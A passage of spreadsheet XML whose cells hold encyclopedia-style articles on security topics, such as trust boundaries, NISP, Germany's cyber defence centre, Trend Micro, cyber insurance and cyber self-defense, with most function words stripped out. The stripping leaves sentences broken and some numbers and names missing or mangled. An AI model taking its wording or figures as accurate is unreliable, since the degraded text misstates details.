decision support systems. 147–154. doi:10.1016/j.dss.2014.02.002. external links http://trustyourplace.com assessment online mobile basel institute commons economics score trust among people place. trust metrics evaluation project paolo massa wiki whose goal review, understand, code compare data trust metrics proposed far.. analyzed trust metrics page provides extensive bibliography work theory implementation trust metrics. trustcomp.org online community academic industrial members research computational trust management online reputation. there also mailing list. online demonstrations subjective logic. raph levien, 2000. advogato's trust metric. electronic manuscript. raph levien, 2002. attack resistant trust metric metadata howto. electronic manuscript. trust metrics foundation rummble recommendations engine based trust networking, including trust network parties</t>
  </si>
  <si>
    <t>Trust boundary</t>
  </si>
  <si>
    <t>trust boundary term used computer science security describes boundary program data execution changes level "trust," principals different capabilities exchange data commands. term refers distinct boundary within system sub-systems (including data) equal trust. example execution trust boundary would application attains increased privilege level (such root). data trust boundary point data comes untrusted source--for example, user input network socket.a "trust boundary violation" refers vulnerability computer software trusts data validated crossing boundary. references</t>
  </si>
  <si>
    <t>National Industrial Security Program</t>
  </si>
  <si>
    <t>national industrial security program, nisp, nominal authority united states managing needs private industry access classified information.the nisp established 1993 executive order 12829. national security council nominally sets policy nisp, director information security oversight office nominally authority implementation. under isoo, secretary defense nominally executive agent, nisp recognizes four different cognizant security agencies, equal authority: department defense, department energy, central intelligence agency, nuclear regulatory commission. nisp operating manual (dod 5220.22-m) major component nisp nisp operating manual, also called nispom, 5220.22-m. nispom establishes standard procedures requirements government contractors, regards classified information. 2017, current nispom edition dated 2006. chapters selected sections edition are: chapter general provisions requirements chapter security clearances section facility clearances section personnel security clearances section foreign ownership, control, influence (foci) chapter security training briefings chapter classification marking chapter safeguarding classified information chapter visits meetings chapter subcontracting chapter information system security chapter special requirements section section critical nuclear weapon design information (cnwdi) section intelligence information section communication security (comsec) chapter international security requirements chapter miscellaneous information section tempest section defense technical information center (dtic) section independent research development (ir&amp;d) efforts appendices data sanitization 5220.22-m sometimes cited standard sanitization counter data remanence. nispom actually covers entire field government–industrial security, data sanitization small part (about paragraphs 141-page document). furthermore, nispom actually specify particular method. standards sanitization left cognizant security authority. defense security service provides clearing sanitization matrix (c&amp;sm) specify methods. june 2007 edition c&amp;sm, overwriting longer acceptable sanitization magnetic media; degaussing physical destruction acceptable. references external links eo-12829 overview ("national industrial security program") eo-12829 nist news archive 2014-12-18</t>
  </si>
  <si>
    <t>National Cyberdefence Centre</t>
  </si>
  <si>
    <t>national cyber defence centre (cyber-abwehrzentrum cyber-az) cooperation, communication coordination platform german (security) authorities institutions different ministries dealing particular cyber-related matters nationwide relevance. basis exchange cyber-related matters incidents every working day, joint, overall cyber-security situation report germany regularly prepared updated. handle issues (potentially) national importance, participants cyber defence centre harmonise coordinate individual authorities' activities. their implementation remains responsibility respective authority institutions. cyber defence centre authority own. federal office information security (bundesamt sicherheit informationstechnik bsi) host cyber defence centre thus provides premises technology bonn cyber defence centre able perform tasks. creation course implementation cyber security strategy germany, cyber defence centre created 2011 joint, inter-authority interinstitutional platform improved accelerated information exchange participating authorities institutions increased coordination protective measures countermeasures security incidents germany. basis cabinet decision dated february 2011, cyber defence centre took work april 2011 initially leadership direct involvement federal office protection constitution (bundesamt verfassungsschutz bfv) well federal office civil protection disaster assistance (bundesamt bevölkerungsschutz katastrophenhilfe bbk). during stage, federal criminal police office (bundeskriminalamt bka), federal police (bundespolizei bpol), central office german customs investigation service (zollkriminalamt zka), federal intelligence service (bundesnachrichtendienst bnd) federal armed forces (bundeswehr) participated so-called associated authorities. based administrative agreement, federal financial supervisory authority (bundesanstalt finanzdienstleistungsaufsicht bafin) also involved since 2015. current organisational set-up with entry force currently valid rules procedure september 2019, cyber defence centre underwent significant development. taking account respective tasks, responsibilities legal powers, eight core authorities equal rights bbk, bsi, bfv, bka, bnd, federal police headquarters well bundeswehr military counterintelligence service (militärischer abschirmdienst bamad) cyber information domain service (kommando cyber- informationsraum kdocir) work together even intensively cyber defence centre. bafin continue involved associated authorities. involvement relevant institutions federal länder level currently tested. this includes representatives judiciary well german länder, underlines whole-of-government federal approach maintaining germany's cyber-security. addition, position coordinator created: this position filled different authorities rotating basis years time. provided first coordinator since december 2019. coordinator supported deputies, currently provided kdocir. follow. tasks mission statement cyber defence centre defines core tasks follows: cyber defence centre cooperation, communication coordination platform appropriate (security) authorities different ministries which, particular joint, up-to-date comprehensive cyber-security situation report germany, strategic reporting coordinating operational interdisciplinary case management, provides indispensable contributions germany's national cyber-security thus also event crisis federal government's capacity act. focus whole-of-government, i.e. cross-authority cross-ministry approach handling matters without interfering individual responsibilities authorities. compliance legal provisions, authorities institutions involved cyber defence centre exchange information cyber-relevant matters daily basis jointly derive implications germany's cyber-security. resulting measures coordinated implemented jurisdiction responsibility appropriate authority. also ccdcoe cyber command enisa central office information technology security sector (zitis) federal office information security national cyber security centre (disambiguation) similar bodies countries references external links national cyber security framework manual https://www.bka.de/de/unsereaufgaben/kooperationen/ncaz/ncaz.html https://www.bundeswehr.de/de/organisation/cyber-und-informationsraum/auftrag/schuetzen/cir-im-nationalen-cyber-abwehrzentrum</t>
  </si>
  <si>
    <t>Trusted Computing Group</t>
  </si>
  <si>
    <t>trusted computing group group formed 2003 successor trusted computing platform alliance previously formed 1999 implement trusted computing concepts across personal computers. members include intel, amd, ibm, microsoft, cisco. core idea trusted computing give hardware manufacturers control software system refusing unsigned software. history october 1999, trusted computing platform alliance (abbreviated tcpa), consortium various technology companies including compaq, hewlett-packard, ibm, intel, microsoft, formed effort promote trust security personal computing platform. november 1999, tcpa announced leading hardware software companies joined alliance first month. january 2001, version trusted computing platform specifications released first original equipment manufacturer incorporate hardware features based specifications introduction thinkpad mobile computer 2002.in 2003, tcpa succeeded trusted computing group, increased emphasis mobile devices.membership fees vary level. promoters annual membership fees $30,000, contributors $15,000, depending upon company size, adopters annual membership fees either $2,500 $7,500. overview tcg's successful effort development trusted platform module (tpm), semiconductor intellectual property core integrated circuit conforms specification enable trusted computing features computers mobile devices. related efforts involved trusted network connect, bring trusted computing network connections, storage core architecture security subsystem class, bring trusted computing disk drives storage devices. these efforts achieved level widespread adoption trusted platform module. criticism group faced widescale opposition free software community grounds technology developing negative impact users' privacy create customer lock-in, especially used create applications. received criticism linux freebsd communities, well software development community general. significant backlash included richard stallman's speech 2006 hackers planet earth conference stallman calls trusted computing "treacherous computing" instead warns allows vendors lock software, rendering unusable.privacy concerns heightened christopher tarnovsky presented methods access compromise infineon non-volatile memory capacity contains user data black 2010. standardization 2009 iso/eic release trusted platform module standards iso/iec 11889-1:2009 information technology—trusted platform module—part overview iso/iec 11889-2:2009 information technology—trusted platform module—part design principles iso/iec 11889-3:2009 information technology—trusted platform module—part structures iso/iec 11889-4:2009 information technology—trusted platform module—part commands references external links official website</t>
  </si>
  <si>
    <t>Cryptographic log on</t>
  </si>
  <si>
    <t>cryptographic log-on (clo) process uses common access cards (cac) embedded public infrastructure (pki) certificates authenticate user's identification workstation network. replaces username passwords identifying authenticating users. log-on cryptographically clo-enabled workstation, users simply insert workstation’s reader provide personal identification number (pin). navy/marine corps intranet, among many secure networks, uses clo. references mauck, james (january–march 2006). "cryptographic logon". chips department navy information technology magazine. united states department navy. archived original 2007-01-15. retrieved 2006-06-01.</t>
  </si>
  <si>
    <t>Trend Micro</t>
  </si>
  <si>
    <t>trend micro inc. (トレンドマイクロ株式会社, torendo maikuro kabushiki-gaisha) american japanese multinational cyber security software company global headquarters tokyo, japan irving, texas, united states, global headquarters taipei, taiwan. other regional headquarters centers located around asia, europe, north america. company develops enterprise security software servers, containers, cloud computing environments, networks, points. cloud virtualization security products provide automated security customers vmware, amazon aws, microsoft azure, google cloud platform.eva chen, founder, currently serves trend micro's chief executive officer, position held since 2005. succeeded founding steve chang, serves chairman. history 1988–1999 company founded 1988 angeles steve chang, wife, jenny chang, sister, chen (陳怡樺). company established proceeds steve chang's previous sale copy protection dongle united states-based rainbow technologies. shortly establishing company, founders moved headquarters taipei.in 1992, trend micro took japanese software firm form trend micro devices established headquarters japan. made agreement maker intel, produced anti-virus product local area networks (lans) sale intel brand. intel paid royalties trend micro sales landesk virus protect united states europe, trend paid royalties intel sales asia. 1993, novell began bundling product network operating system. 1996 companies agreed two-year continuation agreement trend allowed globally market serverprotect product brand alongside intel's landesk brand.trend micro listed tokyo stock exchange 1998 ticker 4704. company began trading united states-based nasdaq stock exchange july 1999. 2000s 2004, founding chief executive officer steve chang decided split responsibilities chairman company. company co-founder chen succeeded chang chief executive officer trend micro january 2005. chen recently served company's chief technology officer since 1996 executive vice president since company's founding october 1989. chang retained position company chairman. may, trend micro acquired braintree, massachusetts-based antispyware company intermute million. trend micro fully integrated intermute's spysubtract antispyware program antispyware product offerings year.in june 2005 trend micro acquired kelkea, jose, california-based developer antispam software. kelkea developed mail abuse prevention system (maps) filtering software allowed internet service providers block spam phishing scams. kelkea chief executive officer dave rand retained trend micro chief technologist content security.in march 2007, trend micro acquired freeware antispyware program hijackthis creator merijn bellekom undisclosed sum. trend micro delisted depository shares nasdaq stock exchange may. later year, october, trend micro acquired mountain view, california-based data loss prevention software developer provilla. provilla creator leakproof, software allowed companies block transmission sensitive data warn security managers transmission attempts.trend micro acquired identum february 2008 undisclosed sum. identum, founded later spun-off university bristol cryptography department, developed id-based email encryption software. identum's chairman serial entrepreneur, steve purdham. companies originally talks trend micro license identum's technology, trend micro later decided purchase firm outright. identum renamed trend micro (bristol) encryption technology integrated existing trend micro products. existing identum products continued sold trend micro brand. also year, trend micro sued barracuda networks latter's distribution clamav part security package. trend micro claimed barracuda's clamav infringed software patent owned trend micro filtering viruses internet gateway. 2011, u.s. patent trademark office issued final rejection reexamination trend micro's u.s. patent 5,623,600.in april 2009, trend micro acquired ottawa, ontario canada-based third brigade undisclosed sum. third brigade developed host-based intrusion prevention firewall software used trend micro trend officescan anti-malware suite years prior acquiring third brigade. third brigade reincorporated trend micro canada technologies. 2010s trend micro acquired leeds, england based humyo june 2010 undisclosed sum. humyo provided cloud-based data storage synchronization services small businesses individuals. later year, november, trend micro acquired mobile armor. mobile armor developer full disk, file folder, removable media encryption mobile devices. trend micro integrated company's technology centrally-managed platform mobile device security.in june 2012, trend micro acquired marlborough, massachusetts-based secure sockets layer (ssl) certificate provider affirmtrust undisclosed sum. trend micro followed another acquisition, taiwanese advanced network-security firm broadweb, october 2012. broadweb developer deep packet inspection technology ability block malicious data packets real-time. technology integrated trend micro's custom defense solution, suite designed provide network-wide visibility protection advanced attacks threats.trend micro relocated headquarters colinas area irving, texas september 2013. relocation allowed company consolidate operations previously housed cupertino, california arlington, texas.in september 2014, trend micro began partnership interpol wherein trend micro shared international police organization information cybercrime threats company's threat intelligence service. according interpol, information helped international police organization member countries decrease cybercrime global scale. trend micro also provided cybercrime investigation training program interpol.also 2014, trend micro expanded cloud security protect microsoft office threats caught native microsoft security. 2016, cloud security software expanded cover box, dropbox google drive.in october 2015, trend micro reached agreement tippingpoint, network software security developer inc. $300 million. this included bounty program, zero initiative incorporated trend micro research's focus existing threats, vulnerabilities, future potential security issues.that year, trend micro certified validation ready solution vblock ready technology alliance partner program. later, trend micro joined select program, allowed trend micro's deep security bundled vce's converged hyper-converged infrastructure systems.gartner named trend micro "leaders" ranking magic quadrant rating endpoint protection platforms 2015, 2016 2017. 2016, trend micro discovered variant virus affecting android phones able infect smart tvs.trend announced launch $100 million venture capital investment fund june 2017 focused next generation technology including internet things (iot). september 2017, trend micro awarded reimbursement u.s. district court portion legal fees incurred rejected patent claims filed intellectual ventures. company subsequently launched trend forward capital. venture's initial investments included business-to-business payment company veem, wearable device company muse, telemetry company mojio brain health technology company interaxon.in november 2017, trend micro acquired immunio, adding capabilities hybrid cloud security neatly devops life cycle. immunio introduced early detection protection application vulnerabilities container image scanning allowing publishing protection secure container images.in december 2017, trend partnered telco systems develop virtual network cybersecurity platform combining trend's virtual network function suite telco's nfvtime software.in april 2018, trend micro joined cybersecurity tech accord, public agreement companies defend customers malicious attacks cybercriminal gangs nation states.in august 2018, researchers discovered several trend micro consumer products macos capturing browser history data, including passwords, sending remote server initial analysis designed enhance security. products identified cleaner, cleaner pro, antivirus, unarchiver, battery, duplicate finder open file. consequence, apple removed trend micro products store. trend micro admitted products captured uploaded data. also apologized "community concern might felt", went excuse activity "humbly result common code libraries", that, event, appropriation users' data "explicitly disclosed applicable eulas".in september 2018 trend micro hitrust announced partnership launch center provides advanced cyber risk management. november 2018 trend micro moxa inc., announced formation joint-venture corporation—txone networks—which focus security needs present industrial internet things (iot) environments. technologies june 2008, trend micro introduced trend micro smart protection network, cloud-client content security infrastructure delivers global threat intelligence protect customers online threats, data stealing malware, phishing attacks, web, email, mobile threats. 2012, trend micro added data analytics smart protection network. data analytics allow network behavioral-based identification methods identify security threats. network also combines in-the-cloud technologies client-based antivirus technologies reduce dependency conventional pattern file downloads endpoint. threat information trend micro's smart protection network deployed real time company's security software portfolio. trend micro's report eu's general data protection regulation showed increase extortion attempts organizations comply privacy laws.trend micro receives threat intelligence trendlabs, company's research, development, support center. trendlabs labs worldwide, headquartered philippines employs 1,200 security experts engineers. company's singapore-based provides malware forensics analysis.in february 2018, trend micro partnered panasonic build secure systems electronic control units automated cars. april 2018, company released tool helps identify individual writing styles combat email fraud. also antivirus software cloud security comparison antivirus software comparison computer viruses references external links official website</t>
  </si>
  <si>
    <t>Cryptography Research</t>
  </si>
  <si>
    <t>cryptography research, inc. francisco based cryptography company specializing applied cryptographic engineering, including technologies building tamper-resistant semiconductors. purchased june 2011 rambus $342.5m. company licenses patents protecting cryptographic devices power analysis attacks. company's cryptofirewall-brand asic cores used conditional access systems anti-counterfeiting applications. also developed bd+, security component blu-ray disc format, played role format blu-ray. company's services group assists security testing, disaster recovery, training. cryptography research protects core operations outside attack maintaining secured local network connected internet all. employees need work sensitive data computers desks access secure network, separate computer access internet. references external links official website</t>
  </si>
  <si>
    <t>Cyber insurance</t>
  </si>
  <si>
    <t>cyber-insurance specialty insurance product intended protect businesses internet-based risks, generally risks relating information technology infrastructure activities. risks nature typically excluded traditional commercial general liability policies least specifically defined traditional insurance products. coverage provided cyber-insurance policies include first-party coverage losses data destruction, extortion, theft, hacking, denial service attacks; liability coverage indemnifying companies losses others caused, example, errors omissions, failure safeguard data, defamation; benefits including regular security-audit, post-incident public relations investigative expenses, criminal reward funds. advantages because cyber-insurance market many countries relatively small compared insurance products, overall impact emerging cyber threats difficult quantify. impact people businesses cyber threats also relatively broad compared scope protection provided insurance products, insurance companies continue develop services. insurers payout cyber-losses, cyber threats develop change, insurance products increasingly purchased alongside existing security services. indeed, underwriting criteria insurers offer cyber-insurance products also early development, underwriters actively partnering security companies develop products. well directly improving security, cyber-insurance enormously beneficial event large-scale security breach. insurance provides smooth funding mechanism recovery major losses, helping businesses return normal reducing need government assistance.as side benefit, cyber-insurance policies require entities attempting procure cyber-insurance policies participate security audit insurance carrier bind policy. this help companies determine current vulnerabilities allow insurance carrier gauge risk taking offering policy entity. completing security audit entity procuring policy required, cases, make necessary improvements security vulnerabilities cyber-insurance policy procured. this in-turn help reduce risk cyber crime company procuring cyber-insurance. finally, insurance allows cyber-security risks distributed fairly, cost premiums commensurate size expected loss risks. this avoids potentially dangerous concentrations risk also preventing free-riding. disadvantages information technology inherent facet virtually modern businesses, requirement separate product exists deliberate scoping exercise excluded theft damage associated modern technologies existing product lines. bruce schneier postulated existing insurance practices tend follow either "flood fire" model however cyber events appear modeled either event types, situation scope cyber insurance restricted decrease risk underwriters. compounding paucity data relating actual damage correlated type event, lack standards associated classification events, lack evidence associated efficacy "industry best practices".insurance relies upon sound actuarial data largely static background risk. given exist present unlikely either buyers products achieve value outcomes desire. this view market reflected current market state standard exclusions result situation insurer could argue apply almost data breach". history early works 1990s focused general merits cyber-insurance. late 1990s, business perspective information security became prominent, visions cyber-insurance risk management tool formulated. although roots 1980s looked promising, battered events 9/11 attacks, market cyber-insurance failed thrive remained niche unusual demands. coverage tightly limited, clients include smbs (small medium businesses) need insurance qualify tenders, community banks small hedge risks online banking operations. first, least first, cyber liability policies call developed lloyd's london market 2000. policy spearheaded keith daniels hamesfahr attorneys chicago, firm blatt, hammesfahr eaton. working closely hacker, lloyd's underwriter, doolittle kinsey carpenter, brokers kinsey carpenter, francisco, insurance broker, policy provided third-party coverage along business interruption coverage. early days, thought risk would company negligently transmit virus could infect companies' systems would bring suit original company well business interruption. policy first, well, include first-party third-party coverages form. while errors omissions likely happened, suits organizations basis proven rare. focus forms developed since 2000 business interruption, payment fines penalties, credit monitoring costs, public relations costs, cost restoring rebuilding private data, continue expand evolve today. also, technology errors omissions policies sold third-party coverage organizations, programmers technology installers could sued advice product fails satisfactory clients. other early entrants cyber market included american international group (aig) chubb. today, companies competing cyber market. even 2002 conservative forecast, predicted global market cyber-insurance worth $2.5 billion 2005, turned five times higher size market 2008. overall, relative terms, market cyber-insurance shrank internet economy grew. practice, several obstacles prevented market cyber-insurance achieving maturity; absence reliable actuarial data compute insurance premiums, lack awareness among decision-makers contributing little demand, well legal procedural hurdles identified first generation" cyber-insurance literature 2005. latter aspect cause frustration claiming compensation damages. furthermore, entities considering cyber-insurance must undergo series often invasive security evaluation procedures, revealing infrastructures policies. meanwhile, witnessing thousands vulnerabilities, millions attacks, substantial improvement defining security standards computer forensics calls question validity factors causally explain lack insurance market. types network security insurance loss derived cyber hacking event. theft fraud. covers loss monies similar monetary instrument) resulting theft assets malicious actor(s) whose fraudulent activity, primarily unauthorized access policyholder's systems, allows actor gain assets fraudulent transfer. forensic investigation. covers legal, technical, forensic services necessary assess whether cyber attack occurred, assess impact attack, stop attack. business interruption. covers lost income related costs policyholder unable conduct business cyber event data loss. extortion. provides coverage costs associated investigation threats commit cyber attacks policyholder’s systems payments extortionists threaten obtain disclose sensitive information. reputation insurance insurance reputation attacks cyber defamation. computer data loss restoration. covers physical damage loss computer-related assets, including costs retrieving restoring data, hardware, software, information destroyed damaged result cyber attack. data restoration. covers expenses related restoration recreation data lost security system failure. current need infrastructure, users, services offered computer networks today subject wide variety risks posed threats include distributed denial service attacks, intrusions various kinds, eavesdropping, hacking, phishing, worms, viruses, spams, etc. order counter risk posed threats, network users traditionally resorted antivirus anti-spam software, firewalls, intrusion-detection systems (idss), add-ons reduce likelihood affected threats. practice, large industry (companies like symantec, mcafee, etc.) well considerable research efforts currently centered around developing deploying tools techniques detect threats anomalies order protect cyber infrastructure users resulting negative impact anomalies. despite improvements risk protection techniques last decade hardware, software, cryptographic methodologies, impossible achieve perfect/near-perfect cyber-security protection. impossibility arises number reasons: scarce existence sound technical solutions. difficulty designing solutions catered varied intentions behind network attacks. misaligned incentives network users, security product vendors, regulatory authorities regarding protecting network. network users taking advantage positive security effects generated users' investments security, turn, investing security resulting free-riding problem. customer lock-in first-mover effects vulnerable security products. difficulty measure risks resulting challenges designing pertinent risk removal solutions. problem lemons market, whereby security vendors incentive release robust products market. liability shell games played product vendors. user naiveness optimally exploiting feature benefits technical solutions.given above-mentioned inevitable barriers near 100% risk mitigation, need arises alternative methods risk management cyberspace. highlight importance improving current state cyber-security, president barack obama issued cyber-security executive order february 2013 emphasizes need reduce cyber-threats resilient them. regard, security researchers recent past identified cyber-insurance potential tool effective risk management. cyber-insurance risk management technique network user risks transferred insurance company, return fee, i.e., insurance premium. examples potential cyber-insurers might include isp, cloud provider, traditional insurance organizations. proponents cyber-insurance believe cyber-insurance would lead design insurance contracts would shift appropriate amounts self-defense liability clients, thereby making cyberspace robust. here term ‘self-defense' implies efforts network user secure system technical solutions anti-virus anti-spam software, firewalls, using secure operating systems, etc. cyber-insurance also potential market solution align economic incentives cyber-insurers, users (individuals/organizations), policymakers, security software vendors. i.e., cyber-insurers earn profit appropriately pricing premiums, network users seek hedge potential losses jointly buying insurance investing self-defense mechanisms, policymakers would ensure increase overall network security, security software vendors could experience increase product sales forming alliances cyber-insurers.a area manage risk establish acceptable risk organization 'reasonable security' specific working environment. practicing 'duty care' helps protect interested parties executives, regulators, judges, public affected risks. duty care risk analysis standard (docra) provides practices principles help balance compliance, security, business objectives developing security controls. legislation 2022, kentucky maryland enacted insurance data security legislation based upon national association insurance commissioners (“naic”) insurance data security model (mdl-668). maryland's takes effect october 2023. kentucky's house bill goes effect january 2023. existing issues consequently, 2005, “second generation" cyber-insurance literature emerged targeting risk management current cyber-networks. authors literature link market failure fundamental properties information technology, specially correlated risk information asymmetries insurers insureds, inter-dependencies.information asymmetry significant negative effect insurance environments, typical considerations include inability distinguish users different (high risk) types, i.e., so-called adverse selection problem, well users undertaking actions adversely affect loss probabilities insurance contract signed, i.e., so-called moral hazard problem. challenge interdependent correlated nature cyber-risks particular cyber-insurance differentiates traditional insurance scenarios (e.g., health insurance) former. large distributed system internet, risks span large nodes correlated. thus, user investments security counter risks generate positive externalities users network. cyber-insurance enable individual users internalize externalities network user optimally invests security solutions, thereby alleviating moral hazard improving network security. traditional insurance scenarios, risk span quite small (sometimes spans entities) uncorrelated, thus internalizing externalities generated user investments safety, much easier. ambiguities terms global 2019 conducted survey cfos companies billion turnover. survey found cfos believed insurance provider would cover "most all" losses company would suffer cyber security attack crime. nevertheless, many cfos reported expected damages related cyber attacks covered typical cyber attack policies. specifically, cfos mentioned anticipated cyber attack devaluation company's brand expected decline revenue. exclusion clauses like insurance policies, cyber insurance typically includes exclusion clause explicitly excluding damage acts war. while majority cyber insurance claims relate simple criminal behaviour, increasingly companies likely fall victim cyberwarfare attacks nation-states terrorist organizations whether specifically targeted simply collateral damage. after governments characterized notpetya attack russian military cyber-attack insurers arguing cover events. current work examples work cyber insurance market include lelarge bolot, (ii) pal, golubchik, psounis, hui, (iii) johnson al., (iv) shetty, these works first comment free-riding behavior internet users without presence cyber-insurance. works lelarge shetty present benefits cyber-insurance incentivizing internet users invest appropriately security; however, works address restricted market types. lelarge model information asymmetry work. shetty prove cyber-insurance markets inefficient conditions information asymmetry. johnson discuss role joint existence self-insurance market insurance adoption different types insurance users. recent work, prove inefficiency cyber-insurance markets conditions partial information asymmetry correlated risks show existence efficient markets (both regulated unregulated) premium discrimination. availability 2014, cyber-insurance premium volume covering exposure united states. although least insurance companies cyber-insurance product offerings, actual writing concentrated within group five underwriters. many insurance companies hesitant enter coverage market, sound actuarial data cyber exposure non-existent. hampering development actuarial data inadequate disclosure regarding cyber attacks affected. after significant malware incident 2017, however, reckitt benckiser released information much cyberattack would impact financial performance, leading analysts believe trend companies transparent data cyber incidents.with cyber insurance premiums expected grow around billion 2015 estimated billion 2025, insurers reinsurers continuing refine underwriting requirements. market immaturity lack standardization reasons underwriting cyber products today make interesting place insurance world. insurance marketplace that’s trying reach standard accommodate needs today’s insured, also, time, rapidly developing exposure landscape capacity available. pricing 2019, average cost cyber liability insurance united states estimated $1,501 year million liability coverage, $10,000 deductible. average annual premium cyber liability limit $500,000 $5,000 deductible $1,146, average annual premium cyber liability limit $250,000 $2,500 deductible $739. addition location, main drivers cost cyber insurance include type business, number credit/debit card transactions performed, storage sensitive personal information date birth social security numbers. references</t>
  </si>
  <si>
    <t>Cyber resilience</t>
  </si>
  <si>
    <t>cyber resilience refers entity's ability continuously deliver intended outcome, despite cyber attacks. resilience cyber attacks essential systems, critical infrastructure, business processes, organizations, societies, nation-states. adverse cyber events negatively impact availability, integrity, confidentiality networked systems associated information services. these events intentional (e.g. cyber attack) unintentional (e.g. failed software update) caused humans, nature, combination thereof. unlike cyber security, designed protect systems, networks data cyber crimes, cyber resilience designed prevent systems networks derailed event security compromised. cyber security effective without compromising usability systems robust continuity business plan resume operations, cyber attack successful. cyber resilience helps businesses recognize hackers advantage innovative tools, element surprise, target successful attempt. this concept helps business prepare, prevent, respond successfully recover intended secure state. this cultural shift organization sees security full-time embedded security best practices day-to-day operations. comparison cyber security, cyber resilience requires business think differently agile handling attacks. objective cyber resilience maintain entity's ability deliver intended outcome continuously times. this means even regular delivery mechanisms failed, crisis security breach. concept also includes ability restore recover regular delivery mechanisms events, well ability continuously change modify delivery mechanisms, needed face risks. backups disaster recovery operations part process restoring delivery mechanisms. frameworks resilience, defined presidential policy directive ppd-21, ability prepare adapt changing conditions withstand recover rapidly disruptions. cyber resilience focuses preventative, detective, reactive controls information technology environment assess gaps drive enhancements overall security posture entity. cyber resilience review (crr) framework assessment entity's resiliency created department homeland security. another framework created symantec based pillars: prepare/identify, protect, detect, respond, recover.the national institute standards technology's special publication 800-160 volume rev. offers framework engineering secure reliable systems—treating adverse cyber events resiliency security issues. particular 800-160 identifies fourteen techniques used improve resiliency: also critical infrastructure protection decentralization internet censorship peer-to-peer proactive cyber defense resilience (organizational) references</t>
  </si>
  <si>
    <t>Cyber risk quantification</t>
  </si>
  <si>
    <t>cyber risk quantification involves application risk quantification techniques organization's cybersecurity risk. cyber risk quantification process evaluating cyber risks identified validating, measuring analyzing available cyber data using mathematical modeling techniques accurately represent organization's cybersecurity environment manner used make informed cybersecurity infrastructure investment risk transfer decisions. cyber risk quantification supporting activity cybersecurity risk management; cybersecurity risk management component enterprise risk management especially important organizations enterprises highly dependent upon information technology (it) networks systems business operations. method quantifying cyber risk value-at-risk (var) method discussed january 2015 world economic forum meeting. meeting, studied researched deemed viable method quantifying cyber risk. well known framework cyber risk quantification called fairtm (factor analysis information risk). fair institute non-profit professional organization committed furthering science cyber operational risk measurement management. cyber-risk quantification automated software supported process allowing users construct mathematical models quantify cyber-security risks. cyber risk quantification gotten increased attention 2022 forrester research analysts beginning cover space. their recent report, emerging cyber risk quantification market: when cisos need decisions, more dashboards highlights fair model, well entrants space taking different approaches. vendor axio global, raised $23m help companies quantify cyber risk. practical implementations cyber risk quantification used variety practical applications, including: cyber insurance cyber security return investment software mitigation costs mathematical definition mathematical definition cyber-risk follows: cyber-risk cyber-confidence'cyber-confidence' actual executed tests passed. this value converted statistical probability associated cyber-risk calculated: example-1: certain number' tests executed passed. let's imagine yields defect-free confidence 97.43%. answer: cyber-risk 2.57%. example-2: 65,536 ports 65,536 ports confirmed dead inactive asset; resistant penetration answer: cyber-confidence 99.83%, cyber-risk 0.17%typically, form cyber-confidence &amp;/or cyber-risk estimation termed testimation because: applied estimate number tests required desired level cyber-confidence applied estimate cyber-confidence cyber-risk) based upon number tests actually executed passed also center internet security iso/iec 27001 iso/iec 27002 nist cybersecurity framework fairtm (factor analysis information risk) quantitative bow-tie cyber risk classification assessment framework better quantifying cyber exposure will help determine risk finance needs references external links world economic forum: partnering cyber resilience towards quantification cyber threats</t>
  </si>
  <si>
    <t>Cyber self-defense</t>
  </si>
  <si>
    <t>cybersecurity, cyber self-defense refers self-defense cyberattack. while generally emphasizes active cybersecurity measures computer users themselves, cyber self-defense sometimes used refer self-defense organizations whole, corporate entities entire nations. surveillance self-defense variant cyber self-defense largely overlaps active passive cybersecurity measures provide defenders higher levels cybersecurity, intrusion detection, incident handling remediation capabilities. various sectors organizations legally obligated adhere cyber security standards. background organizations conduct penetration test internal team hire third-party organization audit organization's systems. larger organizations conduct internal attacker-defender scenarios "red team" attacking "blue team" defending. defenders, namely threat hunters, system administrators, programmers, proactively manage information systems, remediate vulnerabilities, gather cyber threat intelligence, harden operating systems, code, connected devices, networks. blue teams include information physical security personnel employed organization. physical security tested weaknesses, employees target social engineering attacks security audits. digital physical systems audited varying degrees knowledge relevant systems simulate realistic conditions attackers employees, frequently trained security practices measures. full-knowledge test scenarios, known white tests, attacking party knows available information regarding client's systems. black tests, attacking party provided information regarding client's systems. gray tests provide limited information attacking party. cybersecurity researcher jeffrey carr compares cyber self-defense martial arts one's computer network attack surface shrunk reduce risk exploitation. measures authentication enable multi-factor authentication. minimize authentication risk limiting number people know one's three common authentication factors, "something are, something know, something have." unique information characterized possessing particular degree usefulness threat actor gaining unauthorized access person's information. reduce one's social media footprint mitigate risk profile. regularly check one's social media security privacy settings. create strong unique passwords user account change passwords frequently security incident. password manager avoid storing passwords physical form. this incurs greater software risk profile potential vulnerabilities password management software, mitigates risk breaches one's password list stolen lost case keyloggers present machine. attention information might accidentally reveal online posts. change default passwords programs services prevent default credential vulnerability exploitation techniques. appropriately password brute force attack prevention software fail2ban effective equivalent. never give logins passwords anyone unless absolutely necessary change immediately thereafter. security questions answers impossible anybody else answer even access one's social media posts engage social engineering. anti-social engineering measures plug found external storage devices, external hard drives, flash drives, digital media. beware social engineering techniques principles, reciprocity, commitment consistency, social proof, authority, liking, scarcity. beware shoulder surfing, wherein threat actors collect passwords authentication information physically observing target user. beware piggybacking (tailgating) wherein threat actor closely follows authorized personnel secure facility. beware wardriving, wherein threat actors mobile hacking stations gain unauthorized access wifi. wardriving might also consist parabolic microphones gather acoustic data, passwords personally identifiable data. cautious browsing opening email attachments links emails, known phishing. refrain interacting fake phone calls voice fishing, also known "vishing". scan links malicious websites google transparency report check known malware. preventative software measures use, rely solely antivirus software, evading trivial threat actors. this reliance easily altered digital signature, form applied hash, previously known malicious code. antimalware product, malwarebytes anti-malware, conjunction antivirus vulnerability scanning features. update upgrade one's software programs including, limited user's operating system, firmware, software drivers, device drivers. dedicated updating-software enable automated update features. encrypt one's computer phone. regularly create backups one's data. uninstall insecure software adobe flash one's operating system. refrain accessing pages related plugins within one's browser. only software necessary reduce attack surface. refrain rooting one's phone internet-facing device. network information security measures using firewall internet-connected devices. running programs, services, browsers super-user privileged user account, root linux unix administrator (windows), unless understands security risks action. avoiding free wifi logging accounts using appropriately using privacy anonymity software (anonymity network) anonymous browsing, given attracts attention. appropriately using http various internet protocol proxies security measures, disabling http header fields, filtering, relaying traffic proxy servers squid proxy, proxychains, socks4, socks5. publishing public keys authentication able prove one's identity. using strongest encryption method one's router offers updating router firmware. using intrusion detection system(ids) siem (security information event management system) alert indicators compromise, configuration changes operating system, privilege escalation, network security breaches, unauthorized remote logins. using demilitarized zone reduce number systems services openly facing internet. using virtual private network ipsec secure traffic transport layer model harden stack. reporting breaches incidents gather 